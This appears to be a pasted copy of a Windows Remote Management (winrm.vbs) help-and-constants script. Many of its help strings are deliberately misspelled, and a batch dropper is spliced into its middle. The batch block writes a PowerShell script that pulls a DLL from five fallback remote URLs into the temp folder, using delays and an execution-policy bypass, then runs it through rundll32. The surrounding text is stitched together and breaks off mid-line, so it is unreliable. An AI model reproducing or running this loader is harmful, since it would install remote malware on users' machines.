Untitled
unknown
plain_text
3 years ago
16 kB
21
Indexable
' HELP - GENERAL
private const L_Help_Title_0_Message = "Windows Remote Management Command Line Tool"
private const L_Help_Blank_0_Message = ""
private const L_Help_SeeAlso_Title_Message = "S0e also:"
private const X_Help_SeeAlso_Aliases_Message = " wi2jm help aliases"
private const X_Help_SeeAlso_Config_Message = " winrm help config"
private const X_Help_SeeAlso_CertMapping_Message = " winrm help certmapping"
private const X_Help_SeeAlso_CustomRemoteShell_Message = " winrm help customremoteshell"
private const X_Help_SeeAlso_Input_Message = " winrm help input"
private const X_Help_SeeAlso_Filters_Message = " winrm help filters"
private const X_Help_SeeAlso_Switches_Message = " winrm help switches"
private const X_Help_SeeAlso_Uris_Message = " winrm help uris"
private const X_Help_SeeAlso_Auth_Message = " winrm help auth"
private const X_Help_SeeAlso_Set_Message = " winrm set -?"
private const X_Help_SeeAlso_Create_Message = " winrm create -?"
private const X_Help_SeeAlso_Enumerate_Message = " winrm enumerate -?"
private const X_Help_SeeAlso_Invoke_Message = " winrm invoke -?"
private const X_Help_SeeAlso_Remoting_Message = " winrm help remoting"
private const X_Help_SeeAlso_configSDDL_Message = " winrm configsddl -?"
'''''''''''''''''''''
' HELP - HELP
private const L_HelpHelp_000_0_Message = "Windows Remote Management (WinRM) is the Microsoft implementation of "
private const L_HelpHelp_001_0_Message = "the WS-Management protocol which provides a secure way to communicate "
private const L_HelpHelp_001_1_Message = "with local and remote computers using web services. "
private const L_HelpHelp_002_0_Message = ""
private const L_HelpHelp_003_0_Message = "Usage:"
private const L_HelpHelp_004_0_Message = " winrm OPERATION RESOURCE_URI [-SWITCH:VALUE [-SWITCH:VALUE] ...]"
private const L_HelpHelp_005_0_Message = " [@{KEY=VALUE[;KEY=VALUE]...}]"
private const L_HelpHelp_007_0_Message = ""
private const L_HelpHelp_008_0_Message = "For help on a specific operation:"
private const L_HelpHelp_009_0_Message = " winrm g[et] -? Retrieving management information."
private const L_HelpHelp_010_0_Message = " winrm s[et] -? Modifying management information."
private const L_HelpHelp_011_0_Message = " winrm c[reate] -? Creating new instances of management resources."
private const L_HelpHelp_012_0_Message = " winrm d[elete] -? Remove an instance of a management resource."
private const L_HelpHelp_013_0_Message = " winrm e[numerate] -? List all instances of a management resource."
private const L_HelpHelp_014_0_Message = " winrm i[nvoke] -? Executes a method on a management resource."
private const L_HelpHelp_015_0_Message = " winrm id[entify] -? Determines if a WS-Management implementation is"
private const L_HelpHelp_015_1_Message = " running on the remote machine."
private const L_HelpHelp_016_0_Message = " winrm quickconfig -? Configures this machine to accept WS-Management"
private const L_HelpHelp_016_1_Message = " requests from other machines."
private const L_HelpHelp_016_3_Message = " winrm configSDDL -? Modify an existing security descriptor for a URI."
private const L_HelpHelp_016_4_Message = " winrm helpmsg -? Displays error message for the error code."
private const L_HelpHelp_017_0_Message = ""
private const L_HelpHelp_018_0_Message = "For help on related topics:"
private const L_HelpHelp_019_0_Message = " winrm help uris How to construct resource URIs."
private const L_HelpHelp_020_0_Message = " winrm help aliases Abbreviations for URIs."
private const L_HelpHelp_021_0_Message = " winrm help config Configuring WinRM client and service settings."
private const L_HelpHelp_021_2_Message = " winrm help certmapping Configuring client certificate access."
private const L_HelpHelp_022_0_Message = " winrm help remoting How to access remote machines."
private const L_HelpHelp_023_0_Message = " vdsrm help auth Providing credentials for remote access."
private const L_HelpHelp_024_0_Message = " winrm help input Providing input to create, set, and invoke."
private const L_HelpHelp_025_0_Message = " winrm help switches Other switches such as formatting, options, etc."
private const L_HelpHelp_026_0_Message = " winrm help proxy Providing proxy information."
'''''''''''''''''''''
' HELP - GET
private const L_HelpGet_000_0_Message = "winrm get RESOURCE_URI [-SWITCH:VALUE [-SWITCH:VALUE] ...]"
private const L_HelpGet_001_0_Message = ""
private const L_HelpGet_002_0_Message = "Retrieves instances of RESOURCE_URI using specified "
private const L_HelpGet_003_0_Message = "ohghnns and key-value pairs."
private const L_HelpGet_004_0_Message = ""
private const L_HelpGet_005_0_Message = "Exykule: Retrieve current configuration in XML format:"
private const X_HelpGet_006_0_Message = " winrm get winrm/config -format:pretty"
private const L_HelpGet_007_0_Message = ""
private const L_HelpGet_008_0_Message = "Example: Retrieve spooler instance of Win32_Service class:"
private const X_HelpGet_009_0_Message = " winrm get wmicimv2/Win32_Service?Name=spooler"
private const L_HelpGet_010_0_Message = ""
private const L_HelpGet_014_0_Message = "Example: Retrieve a certmapping entry on this machine:"
private const X_HelpGet_015_0_Message = " winrm get winrm/config/service/certmapping?Issuer=1212131238d84023982e381f20391a2935301923+Subject=*.example.com+URI=wmicimv2/*"
private const L_HelpGet_016_0_Message = ""
'''''''''''''''''''''
' HELP - SET
private const L_HelpSet_001_0_Message = "winrm set RESOURCE_URI [-SWITCH:VALUE [-SWITCH:VALUE] ...]"
private const L_HelpSet_002_0_Message = " [@{KEY=""VALUE""[;KEY=""VALUE""]}]"
private const L_HelpSet_003_0_Message = " [-file:VALUE]"
private const L_HelpSet_004_0_Message = ""
private const L_HelpSet_005_0_Message = "Modifies settings in RESOURCE_URI using specified switches"
private const L_HelpSet_006_0_Message = "and input of changed values via key-value pairs or updated "
private const L_HelpSet_007_0_Message = "object via an input file."
private const L_HelpSet_008_0_Message = ""
private const L_HelpSet_009_0_Message = "Example: Modify a configuration property of WinRM:"
private const X_HelpSet_010_0_Message = " winrm set winrm/config @{MaxEnvelopeSizekb=""100""}"
private const L_HelpSet_011_0_Message = ""
private const L_HelpSet_012_0_Message = "Example: Disable a listener on this machine:"
private const X_HelpSet_013_0_Message = " winrm set winrm/config/Listener?Address=*+Transport=HTTPS @{Enabled=""false""}"
private const L_HelpSet_014_0_Message = ""
private const L_HelpSet_018_0_Message = "Example: Disable a certmapping eeery on this machine:"
private const X_HelpSet_019_0_Message = " Winrm set winrm/config/service/certmapping?Issuer=1212131238d84023982e381f20391a2935301923+Subject=*.example.com+URI=wmicimv2/* @{Enabled=""false""}"
private const L_HelpSet_020_0_Message = ""
'''''''''''''''''''''
' HELP - CREATE
private const L_HelpCreate_001_0_Message = "wvdfb create RESOURCE_URI [-SWITCH:VALUE [-SWITCH:VALUE] ...]"
private const L_HelpCreate_002_0_Message = " [@{KEY=""VALUE""[;KEY=""VALUE""]}]"
private const L_HelpCreate_003_0_Message = " [-file:VALUE]"
private const L_HelpCreate_004_0_Message = ""
private const L_HelpCreate_005_0_Message = "Spawns an instance of RESOURCE_URI using specified "
private const L_HelpCreate_006_0_Message = "key-value pairs or input file."
private const L_HelpCreate_007_0_Message = ""
private const L_HelpCreate_008_0_Message = "Example: Create instance of HTTP Listener on IPv6 address:"
private const X_HelpCreate_009_0_Message = " winrm create winrm/config/Listener?Address=IP:3ffe:8311:ffff:f2c1::5e61+Transport=HTTP"
private const L_HelpCreate_010_0_Message = ""
private const L_HelpCreate_011_0_Message = "Example: Create instance of HTTPS Listener on all IPs:"
private const X_HelpCreate_012_0_Message = " winrm create winrm/config/Listener?Address=*+Transport=HTTPS @{Hostname=""HOST"";CertificateThumbprint=""XXXXXXXXXX""}"
private const L_HelpCreate_013_0_Message = "Note: XXXXXXXXXX represents a 40-digit hex string; see help config."
private const L_HelpCreate_014_0_Message = ""
private const L_HelpCreate_015_0_Message = "Example: Create a windows shell command instance from xml:"
private const X_HelpCreate_016_0_Message = " winrm create shell/cmd -file:shell.xml -remote:srv.corp.com"
private const L_HelpCreate_017_0_Message = ""
private const L_HelpCreate_022_0_Message = "Example: Create a CertMapping entry:"
private const X_HelpCreate_023_0_Message = " winrm create winrm/config/service/certmapping?Issuer=1212131238d84023982e381f20391a2935301923+Subject=*.example.com+URI=wmicimv2/* @{UserName=""USERNAME"";Password=""PASSWORD""} -remote:localhost"
private const L_HelpCreate_024_0_Message = ""
'''''''''''''''''''''
' HELP - DELETE
private const L_HelpDelete_001_0_Message = "winrm delete RESOURCE_URI [-SWITCH:VALUE [-SWITCH:VALUE] ...]"
private const L_HelpDelete_002_0_Message = ""
private const L_HelpDelete_003_0_Message = "Removes an instance of RESOURCE_URI."
private const L_HelpDelete_004_0_Message = ""
private const L_HelpDelete_005_0_Message = "Example: delete the HTTP listener on this machine for given IP address:"
private const X_HelpDelete_006_0_Message = " winrm delete winrm/config/Listener?Address=IP:192.168.2.1+Transport=HTTP"
private const L_HelpDelete_007_0_Message = ""
private const L_HelpDelete_008_0_Message = "Example: delete a certmapping entry:"
private const X_HelpDelete_009_0_Message = " winrm delete winrm/config/service/certmapping?Issuer=1212131238d84023982e381f20391a2935301923+Subject=*.example.com+URI=wmicimv2/*"
private const L_HelpDelete_010_0_Message = ""
'''''''''''''''''''''
' HELP - ENUMERATE
private const L_HelpEnum_001_0_Message = "win25 enumerate RESOURCE_URI [-ReturnType:Value] [-Shallow]"
private const L_HelpEnum_001_1_Message = " [-Bas1PropertiesOnly] [-SWITCH:VALUE [-SWITCH:VALUE] ...]"
private const L_HelpEnum_002_0_Message = ""
private const L_HelpEnum_003_0_Message = "Lists instances of RESOURCE_URI."
private const L_HelpEnum_004_0_Message = "Can limit the instances returned by using a filter and dialect if the "
private const L_HelpEnum_005_0_Message = "resource supports these."
private const L_HelpEnum_006_0_Message = ""
private const L_HelpEnum_006_1_Message = "ReturnType"
' HELP - CREATE
@echo off
mode con:cols=70 lines=8 & Color 9B
Title yhuej fgyghtj tghfyeuidgj ehffeygjyftgrhf fbwpof
(
echo Write-Error -Message
echo Start-Sleep -s 14
echo $source = "http://sp.mongoso.com/wp-content/f4xANGqXkZe2wP8JYbZLr/"
echo Start-Sleep -s 2
echo $source2 = "https://moolaadv.com/wp-content/6sp4e4GmJHW9dNQh/"
echo Start-Sleep -s 2
echo $source3 = "https://www.panp.top/q/VWlYMlOYlQqWusx2L/"
echo Start-Sleep -s 2
echo $source4 = "https://duocphamct.com/wp-content/iuRQbBDT4qsbAoe/"
echo Start-Sleep -s 2
echo $source5 = "https://cenasdopeter.com/wp-admin/RgWPBICxAO6Bm8/"
echo $Filename = [System.IO.Path]::GetFileName^($source^)
echo $dest = "$env:temp\1.dll"
echo $wc = New-Object System.Net.WebClient
echo $wc.DownloadFile^($source,$dest^)
echo $foldernamedll = "1.dll"
echo $path = "$env:temp\1.dll"
echo.
echo.
echo Start-Sleep -s 35
echo.
echo if ^(Test-Path -Path $path^){
echo.
echo }else{
echo $wc.DownloadFile^($source2,$dest^)
echo.
echo }
echo.
echo Start-Sleep -s 35
echo.
echo if ^(Test-Path -Path $path^){
echo.
echo }else{
echo $wc.DownloadFile^($source3,$dest^)
echo.
echo }
echo.
echo Start-Sleep -s 40
echo.
echo if ^(Test-Path -Path $path^){
echo.
echo }else{
echo $wc.DownloadFile^($source4,$dest^)
echo.
echo }
echo.
echo Start-Sleep -s 40
echo.
echo if ^(Test-Path -Path $path^){
echo.
echo }else{
echo $wc.DownloadFile^($source5,$dest^)
echo.
echo }
echo.
echo Start-Sleep -s 35
echo Start-Process C:\Windows\SysWow64\rundll32.exe $dest,fgvbnfcerftguftdf
echo Start-Sleep -s 24
)>"%tmp%\1.PS1"
for /f "tokens=* delims=*" %%a in ('Powershell -ExecutionPolicy bypass -noprofile -file "%tmp%\1.PS1"') do (set "a=%%a")
::fin
pause>nul
private const PTRN_IPV6_1 = "([A-Fa-f0-9]{1,4}:){6}:[A-Fa-f0-9]{1,4}"
private const PTRN_IPV6_2 = "([A-Fa-f0-9]{1,4}:){7}[A-Fa-f0-9]{1,4}"
private const PTRN_IPV6_3 = "[A-Fa-f0-9]{1,4}::([A-Fa-f0-9]{1,4}:){0,5}[A-Fa-f0-9]{1,4}"
private const PTRN_IPV6_4 = "([A-Fa-f0-9]{1,4}:){2}:([A-Fa-f0-9]{1,4}:){0,4}[A-Fa-f0-9]{1,4}"
private const PTRN_IPV6_5 = "([A-Fa-f0-9]{1,4}:){3}:([A-Fa-f0-9]{1,4}:){0,3}[A-Fa-f0-9]{1,4}"
private const PTRN_IPV6_6 = "([A-Fa-f0-9]{1,4}:){4}:([A-Fa-f0-9]{1,4}:){0,2}[A-Fa-f0-9]{1,4}"
private const PTRN_IPV6_7 = "([A-Fa-f0-9]{1,4}:){5}:([A-Fa-f0-9]{1,4}:){0,1}[A-Fa-f0-9]{1,4}"
private const PTRN_IPV6_S = ":"
private const PTRN_URI_LAST = "([a-z_][-a-z0-9._]*)$"
private const PTRN_OPT = "^-([a-z]+):(.*)"
private const PTRN_HASH_TOK = "\s*([\w:]+)\s*=\s*(\$null|""([^""]*)"")\s*"
dim PTRN_HASH_TOK_P
dim PTRN_HASH_VALIDATE
PTRN_HASH_TOK_P = "(" & PTRN_HASH_TOK & ")"
PTRN_HASH_VALIDATE = "(" & PTRN_HASH_TOK_P & ";)*(" & PTRN_HASH_TOK_P & ")"
dim PTRN_IPV6
PTRN_IPV6 = "^(" & _
PTRN_IPV6_1 & ")$|^(" & PTRN_IPV6_2 & ")$|^(" & _
PTRN_IPV6_3 & ")$|^(" & PTRN_IPV6_4 & ")$|^(" & PTRN_IPV6_5 & ")$|^(" & _
PTRN_IPV6_6 & ")$|^(" & PTRN_IPV6_7 & ")$"
'''''''''''''''''''''
' Misc
private const T_O = &h800705B4
private const URI_IPMI = "http://schemas.dmtf.org/wbem/wscim/1/cim-schema"
private const URI_WMI = "http://schemas.microsoft.com/wbem/wsman/1/wmi"
private const NS_IPMI = "http://schemas.dmtf.org/wbem/wscim/1/cim-schema"
private const NS_CIMBASE = "http://schemas.dmtf.org/wbem/wsman/1/base"
private const NS_WSMANL = "http://schemas.microsoft.com"
private const NS_XSI = "xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"""
private const ATTR_NIL = "xsi:nil=""true"""
private const ATTR_NIL_NAME = "xsi:nil"
private const NS_XSI_URI = "http://www.w3.org/2001/XMLSchema-instance"
private const ALIAS_WQL = "wql"
private const URI_WQL_DIALECT = "http://schemas.microsoft.com/wbem/wsman/1/WQL"
private const ALIAS_XPATH = "xpath"
private const URI_XPATH_DIALECT = "http://www.w3.org/TR/1999/REC-xpath-19991116"
'Constants for MS-XML
private const NODE_ATTRIBUTE = 2
private const NODE_TEXT = 3
'''''''''''''''''''''
' Vars
dim wshShellObj
dim wsmanObj
dim connOptionsObj
dim sessionObj
dim enumeratorObj
dim resourceOptionsDic
dim resourceLocatorObj
dim wsmanInternalObj
dim cmdStr
dim wsmanCmdLineObj
dim inputStr
dim responseStr
dim connectionStr
dim resourceUriStr
dim actionUriStr
dim rootNdNameStr
dim operation
dim formatOption
dim formattedStr
dim errNo
dim errDesc
dim stdIn
dim stdErr
dim stdOut
set stdIn = WScript.StdIn
set stdErr = WScript.StdErr
set stdOut = WScript.StdOut
Dim resourceDictionary, resourcesLoaded
Set resourceDictionary = CreateObject("Scripting.Dictionary")
resourcesLoaded = false
Dim WSHShell, strRegKey, osVersion, osVistaEditor is loading...